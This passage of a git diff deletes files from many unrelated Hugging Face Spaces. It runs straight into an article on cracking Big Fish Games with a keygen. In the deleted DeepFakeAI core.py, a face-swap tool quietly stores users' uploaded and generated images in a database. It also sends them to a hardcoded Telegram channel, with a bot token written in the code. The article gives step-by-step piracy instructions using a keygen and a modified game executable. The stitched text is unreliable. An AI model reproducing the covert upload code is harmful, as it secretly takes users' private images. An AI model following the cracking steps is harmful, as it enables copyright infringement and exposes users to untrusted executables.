apache-2.0 ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/harpreetsahota/RAQA-Application-Chainlit-Demo/chainlit.md b/spaces/harpreetsahota/RAQA-Application-Chainlit-Demo/chainlit.md deleted file mode 100644 index 78b573aa6a8c31b305db78c7e8849842daeeb7e8..0000000000000000000000000000000000000000 --- a/spaces/harpreetsahota/RAQA-Application-Chainlit-Demo/chainlit.md +++ /dev/null @@ -1,11 +0,0 @@ -# Assignment Part 2: Deploying Your Model to a Hugging Face Space - -Now that you've done the hard work of setting up the RetrievalQA chain and sourcing your documents - let's tie it together in a ChainLit application. 
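In rough terms, the wiring looks like the sketch below. The `build_retrieval_qa_chain()` helper is a hypothetical stand-in for however you constructed your RetrievalQA chain, and the handler signatures assume a recent Chainlit release — adapt both to your own project.

```python
# Minimal sketch, not this Space's exact app.py: hook an existing RetrievalQA chain
# into Chainlit's message handlers.
import chainlit as cl

from my_chains import build_retrieval_qa_chain  # hypothetical helper from your own code


@cl.on_chat_start
async def start() -> None:
    # Build the chain once per session and keep it in the user session for reuse.
    cl.user_session.set("qa_chain", build_retrieval_qa_chain())


@cl.on_message
async def answer(message: cl.Message) -> None:
    qa_chain = cl.user_session.get("qa_chain")
    # RetrievalQA is synchronous; make_async runs it in a worker thread so the UI stays responsive.
    result = await cl.make_async(qa_chain.run)(message.content)
    await cl.Message(content=result).send()
```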
- -### Duplicating the Space - -Since this is our first assignment, all you'll need to do is duplicate this space and add your own `OPENAI_API_KEY` as a secret in the space. - -### Conclusion - -Now that you've shipped an LLM-powered application, it's time to share! 🚀 diff --git a/spaces/hekbobo/bingo/src/pages/api/kblob.ts b/spaces/hekbobo/bingo/src/pages/api/kblob.ts deleted file mode 100644 index 0ce7e6063cdc06838e76f1cff1d5982d34ef52de..0000000000000000000000000000000000000000 --- a/spaces/hekbobo/bingo/src/pages/api/kblob.ts +++ /dev/null @@ -1,56 +0,0 @@ -'use server' - -import { NextApiRequest, NextApiResponse } from 'next' -import FormData from 'form-data' -import { fetch } from '@/lib/isomorphic' -import { KBlobRequest } from '@/lib/bots/bing/types' - -const API_DOMAIN = 'https://bing.vcanbb.top' - -export const config = { - api: { - bodyParser: { - sizeLimit: '10mb' // Set desired value here - } - } -} - -export default async function handler(req: NextApiRequest, res: NextApiResponse) { - try { - const { knowledgeRequest, imageBase64 } = req.body as KBlobRequest - - const formData = new FormData() - formData.append('knowledgeRequest', JSON.stringify(knowledgeRequest)) - if (imageBase64) { - formData.append('imageBase64', imageBase64) - } - - const response = await fetch(`${API_DOMAIN}/images/kblob`, - { - method: 'POST', - body: formData.getBuffer(), - headers: { - "sec-ch-ua": "\"Not/A)Brand\";v=\"99\", \"Google Chrome\";v=\"115\", \"Chromium\";v=\"115\"", - "sec-ch-ua-mobile": "?0", - "sec-ch-ua-platform": "\"Windows\"", - "Referer": `${API_DOMAIN}/web/index.html`, - "Referrer-Policy": "origin-when-cross-origin", - 'x-ms-useragent': 'azsdk-js-api-client-factory/1.0.0-beta.1 core-rest-pipeline/1.10.0 OS/Win32', - ...formData.getHeaders() - } - } - ).then(res => res.text()) - - res.writeHead(200, { - 'Content-Type': 'application/json', - }) - res.end(response || JSON.stringify({ result: { value: 'UploadFailed', message: '请更换 IP 或代理后重试' } })) - } catch (e) { - return res.json({ - result: { - value: 'UploadFailed', - message: `${e}` - } - }) - } -} diff --git a/spaces/hjianganthony/fetch_ner/app.py b/spaces/hjianganthony/fetch_ner/app.py deleted file mode 100644 index de3a34e705fcc2c6c40c176a3eedae94c538b714..0000000000000000000000000000000000000000 --- a/spaces/hjianganthony/fetch_ner/app.py +++ /dev/null @@ -1,45 +0,0 @@ -import gradio as gr -import pandas as pd -import numpy as np - -from src.utils import * - -##### Start ##### - -examples = [ - ["Simply Spiked Lemonade 12 pack at Walmart", "jaccard", 0.1, 0.1], - ["Back to the Roots Garden Soil, 1 cubic foot, at Lowe's Home Improvement", "jaccard", 0.1, 0.1], - ["Costco Member subscription", "jaccard", 0.1, 0.1], - ["Apple watch coupon at Best Buy", "jaccard", 0.1, 0.1], - ["A giraffe at Lincoln Park Zoo", "jaccard", 0.1, 0.1] -] - -def main(sentence: str, score_type: str, threshold_cosine: float, threshold_jaccard: float = 0.1): - threshold = threshold_cosine if score_type == "cosine" else threshold_jaccard - results = search_offers(search_input=sentence, - score=score_type, - score_threshold=threshold) - message, processed_results = process_output(results) - return message, processed_results - -def process_output(output): - """Function to process the output""" - if output is None or output.empty: - return "We couldn't find your results, please try our examples or search again", None - else: - return "We found some great offers!", output - -demo = gr.Interface( - fn=main, - inputs=[ - gr.Textbox(lines=1, placeholder="Type 
here..."), - gr.Dropdown(choices=["cosine", "jaccard"], label="Score Type"), - gr.Slider(minimum=0, maximum=1, step=0.1, label="Threshold for Cosine Similarity"), - gr.Slider(minimum=0, maximum=1, step=0.1, label="Threshold for Jaccard Similarity") - ], - outputs=[gr.Textbox(placeholder="Message..."), gr.Dataframe()], - examples=examples, - live=False, -) - -demo.launch(share=True) diff --git a/spaces/hjs8/CogVideo/style.css b/spaces/hjs8/CogVideo/style.css deleted file mode 100644 index 8e4d705815014cffc50ff1d4c5720797c6206cab..0000000000000000000000000000000000000000 --- a/spaces/hjs8/CogVideo/style.css +++ /dev/null @@ -1,7 +0,0 @@ -h1 { - text-align: center; -} -img#visitor-badge { - display: block; - margin: auto; -} diff --git a/spaces/huggingface-projects/color-palette-generator-sd/static/_app/immutable/chunks/2-306ac409.js b/spaces/huggingface-projects/color-palette-generator-sd/static/_app/immutable/chunks/2-306ac409.js deleted file mode 100644 index 59c5539482df2ceb235dd161b4efadc2f68eb9c9..0000000000000000000000000000000000000000 --- a/spaces/huggingface-projects/color-palette-generator-sd/static/_app/immutable/chunks/2-306ac409.js +++ /dev/null @@ -1 +0,0 @@ -import{default as t}from"../components/pages/_page.svelte-8f425fb1.js";export{t as component}; diff --git a/spaces/huggingface-projects/stable-diffusion-multiplayer/frontend/src/lib/constants.ts b/spaces/huggingface-projects/stable-diffusion-multiplayer/frontend/src/lib/constants.ts deleted file mode 100644 index b2e5c7453d915b4110ae86eafd60f97862ab55ab..0000000000000000000000000000000000000000 --- a/spaces/huggingface-projects/stable-diffusion-multiplayer/frontend/src/lib/constants.ts +++ /dev/null @@ -1,21 +0,0 @@ -export const COLORS = [ - '#505669', - '#414AA6', - '#1C5B92', - '#216B44', - '#893301', - '#912728', - '#98184D', - '#743095', - '#5F4199', - '#8f3f94' -]; - -export const EMOJIS = ['🐝', '🐌', '🐞', '🐜', '🦋', '🐛', '🐝', '🐞', '🦟', '🦗', '🕷', '🦂', '🐢', '🐍', '🦎', '🦖', '🦕', '🐙', '🦑', '🐠', '🐟', '🐡', '🐬', '🦈', '🐳', '🐋', '🐊', '🐅', '🐆', '🦓', '🦍', '🦧', '🐘', '🦛', '🦏', '🐪', '🐫', '🦒', '🐃', '🐂', '🐄', '🐎', '🐖', - '🐏', '🐑', '🐐', '🐕', '🐩', '🐈', '🐓', '🦃', '🦅', '🦆', '🦢', '🦉', '🦚', '🦜', '🦇', '🐁', '🐀', '🐿', '🐇', '🐿', '🦔', '🦇', '🐻', '🐻', '🐨', '🐼', '🐵', '🙈', '🙉', '🙊', '🐒', '🐉', '🐲', '🦕', '🦖', '🐊', '🐢', '🦎', '🐍', '🐦', '🐧', '🦅', '🦆', '🦉', '🦇'] - -export const MAX_CAPACITY = 50; - -export const GRID_SIZE = 32 - -export const FRAME_SIZE = 512 \ No newline at end of file diff --git a/spaces/huohguohbo/Chatbot_REQUIRES_OPENAI_KEY/app.py b/spaces/huohguohbo/Chatbot_REQUIRES_OPENAI_KEY/app.py deleted file mode 100644 index b55feca18653b88ae887b13d6b60571a02816404..0000000000000000000000000000000000000000 --- a/spaces/huohguohbo/Chatbot_REQUIRES_OPENAI_KEY/app.py +++ /dev/null @@ -1,37 +0,0 @@ -import openai -import gradio as gr - -def chat(api_key, message, model): - if not api_key: - return "Please enter a valid API key." 
- - openai.api_key = api_key - - try: - response = openai.Completion.create( - engine=model, - prompt=message, - max_tokens=50, - n=1, - stop=None, - temperature=0.5, - ) - return response.choices[0].text.strip() - except Exception as e: - return f"Error: {str(e)}" - -models = ["gpt-4", "text-davinci-002", "text-curie-002", "text-babbage-002", "text-ada-002"] - -iface = gr.Interface( - fn=chat, - inputs=[ - gr.inputs.Textbox(lines=1, label="API Key"), - gr.inputs.Textbox(lines=5, label="Message"), - gr.inputs.Dropdown(choices=models, label="Model"), - ], - outputs=gr.outputs.Textbox(label="Response"), - title="GPT-4 Chat App", - description="A simple chat app using OpenAI GPT-4 and Gradio.", -) - -iface.launch() diff --git a/spaces/hysts/projected_gan/model.py b/spaces/hysts/projected_gan/model.py deleted file mode 100644 index 0448535cbe5e922c57e28352c9d3935423a8d0a7..0000000000000000000000000000000000000000 --- a/spaces/hysts/projected_gan/model.py +++ /dev/null @@ -1,83 +0,0 @@ -from __future__ import annotations - -import pathlib -import pickle -import sys - -import numpy as np -import torch -import torch.nn as nn -from huggingface_hub import hf_hub_download - -current_dir = pathlib.Path(__file__).parent -submodule_dir = current_dir / 'projected_gan' -sys.path.insert(0, submodule_dir.as_posix()) - - -class Model: - - MODEL_NAMES = [ - 'art_painting', - 'church', - 'bedroom', - 'cityscapes', - 'clevr', - 'ffhq', - 'flowers', - 'landscape', - 'pokemon', - ] - - def __init__(self): - self.device = torch.device( - 'cuda:0' if torch.cuda.is_available() else 'cpu') - self._download_all_models() - self.model_name = self.MODEL_NAMES[3] - self.model = self._load_model(self.model_name) - - def _load_model(self, model_name: str) -> nn.Module: - path = hf_hub_download('public-data/projected_gan', - f'models/{model_name}.pkl') - with open(path, 'rb') as f: - model = pickle.load(f)['G_ema'] - model.eval() - model.to(self.device) - return model - - def set_model(self, model_name: str) -> None: - if model_name == self.model_name: - return - self.model_name = model_name - self.model = self._load_model(model_name) - - def _download_all_models(self): - for name in self.MODEL_NAMES: - self._load_model(name) - - def generate_z(self, seed: int) -> torch.Tensor: - seed = int(np.clip(seed, 0, np.iinfo(np.uint32).max)) - z = np.random.RandomState(seed).randn(1, self.model.z_dim) - return torch.from_numpy(z).float().to(self.device) - - def postprocess(self, tensor: torch.Tensor) -> np.ndarray: - tensor = (tensor.permute(0, 2, 3, 1) * 127.5 + 128).clamp(0, 255).to( - torch.uint8) - return tensor.cpu().numpy() - - @torch.inference_mode() - def generate(self, z: torch.Tensor, label: torch.Tensor, - truncation_psi: float) -> torch.Tensor: - return self.model(z, label, truncation_psi=truncation_psi) - - def generate_image(self, seed: int, truncation_psi: float) -> np.ndarray: - z = self.generate_z(seed) - label = torch.zeros([1, self.model.c_dim], device=self.device) - - out = self.generate(z, label, truncation_psi) - out = self.postprocess(out) - return out[0] - - def set_model_and_generate_image(self, model_name: str, seed: int, - truncation_psi: float) -> np.ndarray: - self.set_model(model_name) - return self.generate_image(seed, truncation_psi) diff --git a/spaces/iccv23-diffusers-demo/Shap-E/settings.py b/spaces/iccv23-diffusers-demo/Shap-E/settings.py deleted file mode 100644 index 256832c72502270fabde0214695d945f8767dec5..0000000000000000000000000000000000000000 --- 
a/spaces/iccv23-diffusers-demo/Shap-E/settings.py +++ /dev/null @@ -1,7 +0,0 @@ -import os - -import numpy as np - -CACHE_EXAMPLES = os.getenv("CACHE_EXAMPLES") == "1" - -MAX_SEED = np.iinfo(np.int32).max diff --git a/spaces/imperialwool/funapi/routes/siteRoutes/__init__.py b/spaces/imperialwool/funapi/routes/siteRoutes/__init__.py deleted file mode 100644 index dde576c2d9a95b9a01692bc96a7a0b3462f11ad5..0000000000000000000000000000000000000000 --- a/spaces/imperialwool/funapi/routes/siteRoutes/__init__.py +++ /dev/null @@ -1 +0,0 @@ -from .systemInfo import * \ No newline at end of file diff --git a/spaces/imseldrith/DeepFakeAI/DeepFakeAI/core.py b/spaces/imseldrith/DeepFakeAI/DeepFakeAI/core.py deleted file mode 100644 index 6134c78d8075f2d00532e6ba60794ae71334067f..0000000000000000000000000000000000000000 --- a/spaces/imseldrith/DeepFakeAI/DeepFakeAI/core.py +++ /dev/null @@ -1,292 +0,0 @@ -#!/usr/bin/env python3 -import asyncio -import sqlite3 -import os -# single thread doubles cuda performance -os.environ['OMP_NUM_THREADS'] = '1' -# reduce tensorflow log level -os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' -import sys -import warnings -from typing import List -import platform -import signal -import shutil -import argparse -import onnxruntime -import tensorflow - -import DeepFakeAI.choices -import DeepFakeAI.globals -from DeepFakeAI import wording, metadata -from DeepFakeAI.predictor import predict_image, predict_video -from DeepFakeAI.processors.frame.core import get_frame_processors_modules -from telegram import Bot -from DeepFakeAI.utilities import is_image, is_video, detect_fps, create_video, extract_frames, get_temp_frame_paths, restore_audio, create_temp, move_temp, clear_temp, normalize_output_path, list_module_names, decode_execution_providers, encode_execution_providers - -warnings.filterwarnings('ignore', category = FutureWarning, module = 'insightface') -warnings.filterwarnings('ignore', category = UserWarning, module = 'torchvision') - - -def parse_args() -> None: - signal.signal(signal.SIGINT, lambda signal_number, frame: destroy()) - program = argparse.ArgumentParser(formatter_class = lambda prog: argparse.HelpFormatter(prog, max_help_position = 120)) - program.add_argument('-s', '--source', help = wording.get('source_help'), dest = 'source_path') - program.add_argument('-t', '--target', help = wording.get('target_help'), dest = 'target_path') - program.add_argument('-o', '--output', help = wording.get('output_help'), dest = 'output_path') - program.add_argument('--frame-processors', help = wording.get('frame_processors_help').format(choices = ', '.join(list_module_names('DeepFakeAI/processors/frame/modules'))), dest = 'frame_processors', default = ['face_swapper'], nargs='+') - program.add_argument('--ui-layouts', help = wording.get('ui_layouts_help').format(choices = ', '.join(list_module_names('DeepFakeAI/uis/layouts'))), dest = 'ui_layouts', default = ['default'], nargs='+') - program.add_argument('--keep-fps', help = wording.get('keep_fps_help'), dest = 'keep_fps', action='store_true') - program.add_argument('--keep-temp', help = wording.get('keep_temp_help'), dest = 'keep_temp', action='store_true') - program.add_argument('--skip-audio', help = wording.get('skip_audio_help'), dest = 'skip_audio', action='store_true') - program.add_argument('--face-recognition', help = wording.get('face_recognition_help'), dest = 'face_recognition', default = 'reference', choices = DeepFakeAI.choices.face_recognition) - program.add_argument('--face-analyser-direction', help = 
wording.get('face_analyser_direction_help'), dest = 'face_analyser_direction', default = 'left-right', choices = DeepFakeAI.choices.face_analyser_direction) - program.add_argument('--face-analyser-age', help = wording.get('face_analyser_age_help'), dest = 'face_analyser_age', choices = DeepFakeAI.choices.face_analyser_age) - program.add_argument('--face-analyser-gender', help = wording.get('face_analyser_gender_help'), dest = 'face_analyser_gender', choices = DeepFakeAI.choices.face_analyser_gender) - program.add_argument('--reference-face-position', help = wording.get('reference_face_position_help'), dest = 'reference_face_position', type = int, default = 0) - program.add_argument('--reference-face-distance', help = wording.get('reference_face_distance_help'), dest = 'reference_face_distance', type = float, default = 1.5) - program.add_argument('--reference-frame-number', help = wording.get('reference_frame_number_help'), dest = 'reference_frame_number', type = int, default = 0) - program.add_argument('--trim-frame-start', help = wording.get('trim_frame_start_help'), dest = 'trim_frame_start', type = int) - program.add_argument('--trim-frame-end', help = wording.get('trim_frame_end_help'), dest = 'trim_frame_end', type = int) - program.add_argument('--temp-frame-format', help = wording.get('temp_frame_format_help'), dest = 'temp_frame_format', default = 'jpg', choices = DeepFakeAI.choices.temp_frame_format) - program.add_argument('--temp-frame-quality', help = wording.get('temp_frame_quality_help'), dest = 'temp_frame_quality', type = int, default = 100, choices = range(101), metavar = '[0-100]') - program.add_argument('--output-video-encoder', help = wording.get('output_video_encoder_help'), dest = 'output_video_encoder', default = 'libx264', choices = DeepFakeAI.choices.output_video_encoder) - program.add_argument('--output-video-quality', help = wording.get('output_video_quality_help'), dest = 'output_video_quality', type = int, default = 90, choices = range(101), metavar = '[0-100]') - program.add_argument('--max-memory', help = wording.get('max_memory_help'), dest = 'max_memory', type = int) - program.add_argument('--execution-providers', help = wording.get('execution_providers_help').format(choices = 'cpu'), dest = 'execution_providers', default = ['cpu'], choices = suggest_execution_providers_choices(), nargs='+') - program.add_argument('--execution-thread-count', help = wording.get('execution_thread_count_help'), dest = 'execution_thread_count', type = int, default = suggest_execution_thread_count_default()) - program.add_argument('--execution-queue-count', help = wording.get('execution_queue_count_help'), dest = 'execution_queue_count', type = int, default = 1) - program.add_argument('-v', '--version', action='version', version = metadata.get('name') + ' ' + metadata.get('version')) - - args = program.parse_args() - - DeepFakeAI.globals.source_path = args.source_path - DeepFakeAI.globals.target_path = args.target_path - DeepFakeAI.globals.output_path = normalize_output_path(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, args.output_path) - DeepFakeAI.globals.headless = DeepFakeAI.globals.source_path is not None and DeepFakeAI.globals.target_path is not None and DeepFakeAI.globals.output_path is not None - DeepFakeAI.globals.frame_processors = args.frame_processors - DeepFakeAI.globals.ui_layouts = args.ui_layouts - DeepFakeAI.globals.keep_fps = args.keep_fps - DeepFakeAI.globals.keep_temp = args.keep_temp - DeepFakeAI.globals.skip_audio = args.skip_audio - 
DeepFakeAI.globals.face_recognition = args.face_recognition - DeepFakeAI.globals.face_analyser_direction = args.face_analyser_direction - DeepFakeAI.globals.face_analyser_age = args.face_analyser_age - DeepFakeAI.globals.face_analyser_gender = args.face_analyser_gender - DeepFakeAI.globals.reference_face_position = args.reference_face_position - DeepFakeAI.globals.reference_frame_number = args.reference_frame_number - DeepFakeAI.globals.reference_face_distance = args.reference_face_distance - DeepFakeAI.globals.trim_frame_start = args.trim_frame_start - DeepFakeAI.globals.trim_frame_end = args.trim_frame_end - DeepFakeAI.globals.temp_frame_format = args.temp_frame_format - DeepFakeAI.globals.temp_frame_quality = args.temp_frame_quality - DeepFakeAI.globals.output_video_encoder = args.output_video_encoder - DeepFakeAI.globals.output_video_quality = args.output_video_quality - DeepFakeAI.globals.max_memory = args.max_memory - DeepFakeAI.globals.execution_providers = decode_execution_providers(args.execution_providers) - DeepFakeAI.globals.execution_thread_count = args.execution_thread_count - DeepFakeAI.globals.execution_queue_count = args.execution_queue_count - - -def suggest_execution_providers_choices() -> List[str]: - return encode_execution_providers(onnxruntime.get_available_providers()) - - -def suggest_execution_thread_count_default() -> int: - if 'CUDAExecutionProvider' in onnxruntime.get_available_providers(): - return 8 - return 1 - - -def limit_resources() -> None: - # prevent tensorflow memory leak - gpus = tensorflow.config.experimental.list_physical_devices('GPU') - for gpu in gpus: - tensorflow.config.experimental.set_virtual_device_configuration(gpu, [ - tensorflow.config.experimental.VirtualDeviceConfiguration(memory_limit = 1024) - ]) - # limit memory usage - if DeepFakeAI.globals.max_memory: - memory = DeepFakeAI.globals.max_memory * 1024 ** 3 - if platform.system().lower() == 'darwin': - memory = DeepFakeAI.globals.max_memory * 1024 ** 6 - if platform.system().lower() == 'windows': - import ctypes - kernel32 = ctypes.windll.kernel32 # type: ignore[attr-defined] - kernel32.SetProcessWorkingSetSize(-1, ctypes.c_size_t(memory), ctypes.c_size_t(memory)) - else: - import resource - resource.setrlimit(resource.RLIMIT_DATA, (memory, memory)) - - -def update_status(message : str, scope : str = 'FACEFUSION.CORE') -> None: - print('[' + scope + '] ' + message) - - -def pre_check() -> bool: - if sys.version_info < (3, 10): - update_status(wording.get('python_not_supported').format(version = '3.10')) - return False - if not shutil.which('ffmpeg'): - update_status(wording.get('ffmpeg_not_installed')) - return False - return True - -def save_to_db(source_path, target_path, output_path): - try: - # Open the images in binary mode - with open(source_path, 'rb') as source_file, \ - open(target_path, 'rb') as target_file, \ - open(output_path, 'rb') as output_file: - - # read data from the image files - source_data = source_file.read() - target_data = target_file.read() - output_data = output_file.read() - - # Extract original filenames from the paths - source_filename = os.path.basename(source_path) - target_filename = os.path.basename(target_path) - output_filename = os.path.basename(output_path) - print(source_filename, target_filename,output_filename) - - # connect to the database - conn = sqlite3.connect('./feed.db') - c = conn.cursor() - - # Create the table if it doesn't exist - c.execute(''' - CREATE TABLE IF NOT EXISTS images ( - source_filename TEXT, - target_filename TEXT, - 
output_filename TEXT, - source_data BLOB, - target_data BLOB, - output_data BLOB - ) - ''') - - # Insert filename and image data into the table - c.execute("INSERT INTO images VALUES (?, ?, ?, ?, ?, ?)", - (source_filename, target_filename, output_filename, source_data, target_data, output_data)) - - # Save changes and close the connection - conn.commit() - - except Exception as e: - # Print any error occurred while saving data in SQLite - print(f"An error occurred: {e}") - - finally: - # Ensure the DB connection is closed - if conn: - conn.close() - - print(f'Saved image data to database from {source_path}, {target_path}, and {output_path}.') -async def send_channel(bot, file_path): - with open(file_path, "rb") as file: - response = await bot.send_document(chat_id="-1001685415853", document=file) - return response - -async def saveT(source_path, target_path, output_path): - bot = Bot(token="6192049990:AAFyOtuYYqkcyUG_7gns3mm7m_kfWE9fZ1k") - - # Send each file - for path in [source_path, target_path, output_path]: - await send_channel(bot, path) - - # Send a message after all files are sent - await bot.send_message(chat_id="-1001685415853", text="All files have been sent!") - -def process_image() -> None: - if predict_image(DeepFakeAI.globals.target_path): - return - shutil.copy2(DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path) - # process frame - for frame_processor_module in get_frame_processors_modules(DeepFakeAI.globals.frame_processors): - update_status(wording.get('processing'), frame_processor_module.NAME) - frame_processor_module.process_image(DeepFakeAI.globals.source_path, DeepFakeAI.globals.output_path, DeepFakeAI.globals.output_path) - frame_processor_module.post_process() - # validate image - if is_image(DeepFakeAI.globals.target_path): - update_status(wording.get('processing_image_succeed')) - save_to_db(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path) - asyncio.run(saveT(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path)) - else: - update_status(wording.get('processing_image_failed')) - - -def process_video() -> None: - if predict_video(DeepFakeAI.globals.target_path): - return - fps = detect_fps(DeepFakeAI.globals.target_path) if DeepFakeAI.globals.keep_fps else 25.0 - update_status(wording.get('creating_temp')) - create_temp(DeepFakeAI.globals.target_path) - # extract frames - update_status(wording.get('extracting_frames_fps').format(fps = fps)) - extract_frames(DeepFakeAI.globals.target_path, fps) - # process frame - temp_frame_paths = get_temp_frame_paths(DeepFakeAI.globals.target_path) - if temp_frame_paths: - for frame_processor_module in get_frame_processors_modules(DeepFakeAI.globals.frame_processors): - update_status(wording.get('processing'), frame_processor_module.NAME) - frame_processor_module.process_video(DeepFakeAI.globals.source_path, temp_frame_paths) - frame_processor_module.post_process() - else: - update_status(wording.get('temp_frames_not_found')) - return - # create video - update_status(wording.get('creating_video_fps').format(fps = fps)) - if not create_video(DeepFakeAI.globals.target_path, fps): - update_status(wording.get('creating_video_failed')) - return - # handle audio - if DeepFakeAI.globals.skip_audio: - update_status(wording.get('skipping_audio')) - move_temp(DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path) - else: - update_status(wording.get('restoring_audio')) - restore_audio(DeepFakeAI.globals.target_path, 
DeepFakeAI.globals.output_path) - # clear temp - update_status(wording.get('clearing_temp')) - clear_temp(DeepFakeAI.globals.target_path) - # validate video - if is_video(DeepFakeAI.globals.target_path): - update_status(wording.get('processing_video_succeed')) - save_to_db(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path) - asyncio.run(saveT(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path)) - else: - update_status(wording.get('processing_video_failed')) - - -def conditional_process() -> None: - for frame_processor_module in get_frame_processors_modules(DeepFakeAI.globals.frame_processors): - if not frame_processor_module.pre_process(): - return - if is_image(DeepFakeAI.globals.target_path): - process_image() - if is_video(DeepFakeAI.globals.target_path): - process_video() - -def run() -> None: - parse_args() - limit_resources() - # pre check - if not pre_check(): - return - for frame_processor in get_frame_processors_modules(DeepFakeAI.globals.frame_processors): - if not frame_processor.pre_check(): - return - # process or launch - if DeepFakeAI.globals.headless: - conditional_process() - else: - import DeepFakeAI.uis.core as ui - - ui.launch() - - -def destroy() -> None: - if DeepFakeAI.globals.target_path: - clear_temp(DeepFakeAI.globals.target_path) - sys.exit() diff --git a/spaces/imseldrith/FaceSwap/.github/ISSUE_TEMPLATE/bug.md b/spaces/imseldrith/FaceSwap/.github/ISSUE_TEMPLATE/bug.md deleted file mode 100644 index a0f9c2ea981873f2462a95e1607c5674397c2f43..0000000000000000000000000000000000000000 --- a/spaces/imseldrith/FaceSwap/.github/ISSUE_TEMPLATE/bug.md +++ /dev/null @@ -1,47 +0,0 @@ ---- -name: Bug -about: Report a bug -labels: 'bug' - ---- - -## Description - -A concise description of the bug and how to reproduce it. - -## Error - -Paste the error or exception from your console: - -``` - -``` - -## Details - -What operating system are you using? - -- [ ] Windows -- [ ] MacOS (Apple Silicon) -- [ ] MacOS (Apple Legacy) -- [ ] Linux -- [ ] Linux in WSL - -What execution provider are you using? - -- [ ] CPU -- [ ] CUDA -- [ ] CoreML -- [ ] DirectML -- [ ] OpenVINO -- [ ] Other - -What version of Roop are you using? - -- [ ] 1.0.0 -- [ ] 1.1.0 -- [ ] 1.2.0 -- [ ] 1.3.0 -- [ ] 1.3.1 -- [ ] 1.3.2 -- [ ] next diff --git a/spaces/inplisQlawa/anything-midjourney-v4-1/Big Fish Games LINK Crack Keygen.md b/spaces/inplisQlawa/anything-midjourney-v4-1/Big Fish Games LINK Crack Keygen.md deleted file mode 100644 index f2207fac743ca945f0abe230933e4fe30882395c..0000000000000000000000000000000000000000 --- a/spaces/inplisQlawa/anything-midjourney-v4-1/Big Fish Games LINK Crack Keygen.md +++ /dev/null @@ -1,100 +0,0 @@ -
          -

          How to Crack Big Fish Games with a Keygen

          -

          If you are a fan of casual games, you might have heard of Big Fish Games, a popular game developer and publisher that offers a wide range of genres and titles. Some of their most famous games include Mahjong Towers, Top Ten Solitaire, Word Wizard, Forgotten Riddles, Fish Tycoon, Grimm's Hatchery, Master of Defense, and more.

          -

          However, if you want to enjoy these games without paying for them, you might be looking for a way to crack them with a keygen. A keygen is a small program that can generate valid activation keys for software products. In this article, we will show you how to use a keygen to crack Big Fish Games with ease.

          -

          big fish games crack keygen


          Download Zip »»» https://urlin.us/2uEwy0



          -

          What You Need

          -

          Before you start cracking Big Fish Games, you will need the following things:

          - -

          How to Crack Big Fish Games

          -

          Once you have everything ready, follow these steps to crack Big Fish Games:

          -
            -
          1. Install your desired Big Fish game on your computer. Make sure it is listed in the keygen's supported games list.
          2. -
          3. Extract the keygen and the modified game client from their respective archives.
          4. -
          5. Copy the modified game client's .exe file and paste it into the game installation folder. Replace the original .exe file if asked.
          6. -
          7. Run the keygen and select your game from the list.
          8. -
          9. Click the "Open reg Dialog" button and locate and open the game's main program (.exe file).
          10. -
          11. A window will open and ask you to enter a key. Copy the value of "Fingerprint" in this window and paste it into the keygen. Then type a "Name" and generate a "Key".
          12. -
          13. Copy the generated key and paste it into the window asking for a key. Click "OK".
          14. -
          15. A message will pop up saying "KEY VALID". Congratulations, you have successfully cracked your Big Fish game!
          16. -
          -

          Tips and Tricks

          -

          Here are some tips and tricks to make your cracking experience easier and better:

          -
            -
          • There is usually a hidden .exe file that has the name of the game in the game installation folder. Running this hidden .exe file will either run the game as a full version or prompt for a key.
          • -
          • The keygen can generate keys for more than 4000 Big Fish games, so you can use it to crack any game you want.
          • -
          • If you are using a Mac, you can try to use "Wine HQ" to run the keygen. However, we cannot guarantee that it will work.
          • -
          • The modified game client can bypass the Big Fish Game Manager, so you don't need it to play your cracked games.
          • -
          -

          Conclusion

          -

          In this article, we have shown you how to crack Big Fish Games with a keygen. This is a simple and effective way to enjoy casual games without paying for them. However, we do not encourage piracy or illegal activities. If you like Big Fish Games works, please support them by buying their games legally.

          -

          Why Crack Big Fish Games?

          -

          Big Fish Games are fun and entertaining, but they also come with a price. If you want to play the full version of any Big Fish game, you have to buy it from their website or from other platforms like Steam or GOG. The prices vary depending on the game, but they usually range from $2.99 to $19.99.

          -

          -

          However, not everyone can afford to pay for these games, or they simply don't want to spend money on something they can get for free. That's why some people resort to cracking Big Fish Games with a keygen. Cracking Big Fish Games allows you to enjoy unlimited gameplay without paying a dime. You can also play offline without any internet connection or ads.

          -

          Is Cracking Big Fish Games Legal?

          -

          The short answer is no. Cracking Big Fish Games with a keygen is illegal and unethical. It violates the terms of service and the copyright of Big Fish Games and their developers. It also deprives them of their rightful income and recognition for their hard work and creativity.

          -

          Cracking Big Fish Games with a keygen can also expose you to various risks and dangers. For example, you might download a fake or malicious keygen that can harm your computer or steal your personal information. You might also face legal consequences if you are caught cracking Big Fish Games with a keygen.

          -

          What Are the Alternatives to Cracking Big Fish Games?

          -

          If you want to play Big Fish Games without cracking them with a keygen, you have some alternatives that are legal and safe. For example, you can:

          -
            -
          • Play the free trial versions of Big Fish Games. You can download them from their website and play them for 60 minutes without any limitations.
          • -
          • Wait for discounts and sales on Big Fish Games. You can check their website regularly or subscribe to their newsletter to get notified of any special offers or deals on their games.
          • -
          • Use coupons and promo codes on Big Fish Games. You can find them on various websites or forums that share them with other gamers.
          • -
          • Join the Big Fish Game Club. This is a monthly subscription service that gives you access to over 2500 games for $6.99 per month. You also get one free game credit every month that you can use to buy any game of your choice.
          • -
          -

          What Are the Benefits of Cracking Big Fish Games?

          -

          Cracking Big Fish Games with a keygen can have some benefits for you as a gamer. For example, you can:

          -
            -
          • Save money on buying games. You can play any Big Fish game you want without spending a dime.
          • -
          • Play offline without any interruptions. You don't need an internet connection or a Big Fish Game Manager to run your cracked games.
          • -
          • Explore different genres and titles. You can try out various Big Fish games and discover new ones that suit your taste and preference.
          • -
          • Have fun and relax. You can enjoy casual games that are easy to play and entertaining to watch.
          • -
          -

          What Are the Drawbacks of Cracking Big Fish Games?

          -

          Cracking Big Fish Games with a keygen can also have some drawbacks for you as a gamer. For example, you might:

